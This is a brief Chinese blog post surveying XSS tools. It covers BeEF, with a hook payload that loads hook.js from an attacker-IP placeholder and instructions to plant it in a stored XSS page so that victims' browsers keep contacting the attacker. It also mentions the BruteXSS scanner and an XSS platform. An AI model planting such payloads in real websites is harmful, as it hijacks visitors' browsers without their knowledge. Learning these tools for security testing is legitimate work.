XSS工具

Posted zmqqq

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS工具相关的知识,希望对你有一定的参考价值。

1.BEEF

KALI中启动BEEFXSS

技术图片

PAYLOAD为

<script src=”http://攻击机IP:3000/hook.js”></script>

将攻击代码插入到存储型XSS中

技术图片

受害者访问存储型XSS界面,可以看到受害者不停地与攻击机进行通信

技术图片

可以执行非常多的功能

技术图片

2.BruteXSS

地址: https://github.com/shawarkhanethicalhacker/BruteXSS-1

技术图片技术图片

3.XSS平台

技术图片

以上是关于XSS工具的主要内容,如果未能解决你的问题,请参考以下文章

安全客简报 | xssfork:一款XSS探测工具

XSS工具

XSS Fuzzer工具

处理XSS漏洞的工具类代码

脚本工具绕过XSS防御机制

XSS漏洞扫描工具:BruteXSS